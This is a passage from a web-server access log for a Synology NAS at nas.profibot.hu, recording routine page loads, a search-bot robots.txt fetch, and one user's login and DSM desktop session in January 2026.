192.168.100.30] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://nas.profibot.hu/" +[29/Jan/2026:05:44:43 +0000] - 200 200 - GET https nas.profibot.hu "/" [Client 37.76.13.82] [Length 769] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://nas.profibot.hu/" +[29/Jan/2026:05:44:43 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Desktop.SessionData&version=1&method=getjs_mobile&SynoToken=--------" [Client 37.76.13.82] [Length 668] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://nas.profibot.hu/" +[29/Jan/2026:05:44:43 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Desktop.Defs&version=1&method=getjs&v=42962&SynoToken=--------" [Client 37.76.13.82] [Length 3648] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://nas.profibot.hu/" +[29/Jan/2026:05:44:43 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/query.cgi?_dc=1769665483108" [Client 37.76.13.82] [Length 9496] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://nas.profibot.hu/" +[29/Jan/2026:05:44:43 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi?_dc=1769665483287" [Client 37.76.13.82] [Length 71] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://nas.profibot.hu/" +[29/Jan/2026:05:44:46 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi?_dc=1769665483514" [Client 37.76.13.82] [Length 395] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://nas.profibot.hu/" +[29/Jan/2026:05:44:56 +0000] - 200 200 - GET https nas.profibot.hu "/" [Client 37.76.13.82] [Length 769] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[29/Jan/2026:05:44:56 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Desktop.SessionData&version=1&method=getjs_mobile&SynoToken=--------" [Client 37.76.13.82] [Length 668] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://nas.profibot.hu/" +[29/Jan/2026:05:44:57 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/query.cgi?_dc=1769665496652" [Client 37.76.13.82] [Length 9496] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://nas.profibot.hu/" +[29/Jan/2026:05:44:57 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi?_dc=1769665496823" [Client 37.76.13.82] [Length 71] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://nas.profibot.hu/" +[29/Jan/2026:05:44:59 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi?_dc=1769665497313" [Client 37.76.13.82] [Length 395] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://nas.profibot.hu/" +[29/Jan/2026:05:45:02 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi?_dc=1769665501855" [Client 37.76.13.82] [Length 1548] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://nas.profibot.hu/" +[29/Jan/2026:05:45:05 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi?_dc=1769665504580" [Client 37.76.13.82] [Length 286] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://nas.profibot.hu/" +[29/Jan/2026:05:45:05 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi?_dc=1769665504573" [Client 37.76.13.82] [Length 444] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://nas.profibot.hu/" +[29/Jan/2026:05:45:05 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi?_dc=1769665504697" [Client 37.76.13.82] [Length 444] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:05:45:27 +0000] - 200 200 - GET https nas.profibot.hu "/robots.txt" [Client 74.7.244.60] [Length 26] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot" "-" +[30/Jan/2026:13:44:04 +0000] - 200 200 - GET https nas.profibot.hu "/" [Client 84.1.26.27] [Length 2819] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[30/Jan/2026:13:44:04 +0000] - 304 304 - GET https nas.profibot.hu "/webman/3rdparty/WebDAVServer/style.css?v=1767609886" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:04 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Desktop.SessionData&version=1&method=getjs&SynoToken=&v=1656670912" [Client 84.1.26.27] [Length 708] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:05 +0000] - 200 200 - GET https nas.profibot.hu "/webman/resources/images/icon_dsm_32.png?v=40438" [Client 84.1.26.27] [Length 752] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:05 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.API.Auth" [Client 84.1.26.27] [Length 64] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:06 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi/SYNO.API.Auth.UIConfig" [Client 84.1.26.27] [Length 11856] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:10 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 69] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:10 +0000] - 200 200 - GET https nas.profibot.hu "/webman/login/dist/dsm.login.bundle.6928208ca354b3a59af5.4.js" [Client 84.1.26.27] [Length 3157] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:10 +0000] - 200 200 - GET https nas.profibot.hu "/webman/login/dist/assets/37727926274c0048982bf8cdf53824c8.svg" [Client 84.1.26.27] [Length 5638] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/login/dist/style.css?v=1661421011" +[30/Jan/2026:13:44:10 +0000] - 200 200 - GET https nas.profibot.hu "/webman/login/dist/assets/944a992fb1e17b455579f66f923313fb.png" [Client 84.1.26.27] [Length 780] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/login/dist/2.style.css" +[30/Jan/2026:13:44:10 +0000] - 200 200 - GET https nas.profibot.hu "/webman/login/dist/assets/1bc43875501e55e5e741e427ca50dbdf.png" [Client 84.1.26.27] [Length 475] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/login/dist/2.style.css" +[30/Jan/2026:13:44:19 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.API.Auth" [Client 84.1.26.27] [Length 64] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:25 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.API.Auth" [Client 84.1.26.27] [Length 334] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:25 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi/SYNO.Core.Desktop.PersonalUpdater" [Client 84.1.26.27] [Length 70] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:26 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/query.cgi" [Client 84.1.26.27] [Length 9496] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:26 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Desktop.Defs&version=1&method=getjs&SynoToken=rxy.D95tk.Pk.&v=1768242326" [Client 84.1.26.27] [Length 3648] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:26 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?_dc=1769780666570&SynoToken=rxy.D95tk.Pk.&launch_app=null&api=SYNO.Core.Desktop.Initdata&method=get_user_service&version=1" [Client 84.1.26.27] [Length 5260] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:26 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 204] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:27 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?lang=%22hun%22&debug=null&launch_app=null&api=SYNO.Core.Desktop.Initdata&method=get_ui_config&version=1&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 109014] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:27 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 3339] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:27 +0000] - 200 200 - GET https nas.profibot.hu "/webman/taskbar/dist/assets/739a21a1e93de2c1dbf6855ddda88c4c.png" [Client 84.1.26.27] [Length 1809] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/taskbar/dist/style.css?v=1661421011" +[30/Jan/2026:13:44:27 +0000] - 200 200 - GET https nas.profibot.hu "/webman/taskbar/dist/assets/aba1d1ad2890d15e40e03c3c8883a34a.png" [Client 84.1.26.27] [Length 1678] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/taskbar/dist/style.css?v=1661421011" +[30/Jan/2026:13:44:27 +0000] - 200 200 - GET https nas.profibot.hu "/webman/taskbar/dist/assets/6cef68f76baafc82c0872419a3d9e48b.png" [Client 84.1.26.27] [Length 1387] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/taskbar/dist/style.css?v=1661421011" +[30/Jan/2026:13:44:27 +0000] - 200 200 - GET https nas.profibot.hu "//synoscgi.sock/socket.io/?Version=42962&SynoToken=rxy.D95tk.Pk.&UserType=user&EIO=3&transport=polling&t=PmF9UNo" [Client 84.1.26.27] [Length 102] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:27 +0000] - 200 200 - GET https nas.profibot.hu "/webman/taskbar/dist/assets/34ac1bdf9b5af8bf425905e26994e7a7.png" [Client 84.1.26.27] [Length 1127] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/taskbar/dist/style.css?v=1661421011" +[30/Jan/2026:13:44:27 +0000] - 200 200 - GET https nas.profibot.hu "/webman/resources/images/2x/default_wallpaper/dsm7_01.jpg?v=42962" [Client 84.1.26.27] [Length 578302] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:28 +0000] - 200 200 - GET https nas.profibot.hu "/webman/taskbar/dist/assets/5d0db4f65187f9ecb3e6b69bdf1ca516.png" [Client 84.1.26.27] [Length 1151] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/taskbar/dist/style.css?v=1661421011" +[30/Jan/2026:13:44:28 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/HelpBrowser/images/1x/help_64.png?v=42962-s9" [Client 84.1.26.27] [Length 6618] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:28 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/PkgManApp/images/package_center_64.png?v=42962-s9" [Client 84.1.26.27] [Length 4315] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:28 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/AdminCenter/images/1x/ControlPanel_64.png?v=42962-s9" [Client 84.1.26.27] [Length 2674] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:28 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/SynologyAccount/SynologyAccount.js?v=42962-s9&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 1069] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:28 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Synohdpack&version=1&method=getHDIcon&res=64&retina=false&path=webman/3rdparty/FileBrowser/images/icon/FileStation_{0}.png&app_version=1.3.4-1404" [Client 84.1.26.27] [Length 5416] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:28 +0000] - 200 200 - GET https nas.profibot.hu "//synoscgi.sock/socket.io/?Version=42962&SynoToken=rxy.D95tk.Pk.&UserType=user&EIO=3&transport=polling&t=PmF9UP-&sid=iBANAb7tRX6bbyFxAAAJ" [Client 84.1.26.27] [Length 4] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:28 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi/SYNO.Core.BackgroundTask" [Client 84.1.26.27] [Length 1100] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:28 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/WelcomeApp/WelcomeApp.js?v=42962-s9&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 21702] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:28 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/WelcomeApp/PromotionApp.js?v=42962-s9&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 5534] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:28 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Synohdpack&version=1&method=getHDIcon&res=64&retina=false&path=webman/3rdparty/AntiVirus/images/anti_virus_{0}.png&app_version=1.5.4-3099" [Client 84.1.26.27] [Length 5277] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:28 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 42] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:28 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi/SYNO.Core.EW.Info" [Client 84.1.26.27] [Length 158] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:28 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/HelpBrowser/HelpUtils.js?v=42962-s9&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 929] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:28 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/LoginNotify/LoginNotify.js?v=42962-s9&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 682] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:28 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/ResetAdminApp/ResetAdminApp.js?v=42962-s9&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 4653] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:28 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Widgets/Main.js?v=42962-s9&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 8820] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:28 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 80] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:28 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/HelpBrowser/HelpBrowser.js?v=42962-s9&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 14796] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:28 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Widgets/MainVue.js?v=42962-s9&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 16917] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:28 +0000] - 200 200 - GET https nas.profibot.hu "/synoSDSjslib/images/1x/wdheader_bt_close.png?v=9135693d6266ca5497970e4b5364da96" [Client 84.1.26.27] [Length 1304] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/synoSDSjslib/sds.css?v=1654081517" +[30/Jan/2026:13:44:28 +0000] - 200 200 - GET https nas.profibot.hu "/synoSDSjslib/images/1x/wdheader_bt_maximize.png?v=bd313f935fb44a57c6860fa43665267f" [Client 84.1.26.27] [Length 583] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/synoSDSjslib/sds.css?v=1654081517" +[30/Jan/2026:13:44:28 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.PersonalSettings&method=wallpaper&version=1&path=%22%22&retina=true&id=1&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 578302] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:28 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Utils/external_device_util.js?v=42962-s9&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 500] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:28 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/SystemInfoApp/images/1x/wdgt_icn_title_storage_manager.png?v=42962-s9" [Client 84.1.26.27] [Length 979] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:28 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Utils/circleGradient.js?v=42962-s9&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 2456] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:28 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/BandwidthControl/BandwidthControl.js?v=42962-s9&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 6408] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:28 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Utils/TreeGrid.js?v=42962-s9&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 5290] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:28 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/SystemInfoApp/images/1x/wdgt_icn_title_system_info.png?v=42962-s9" [Client 84.1.26.27] [Length 917] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) 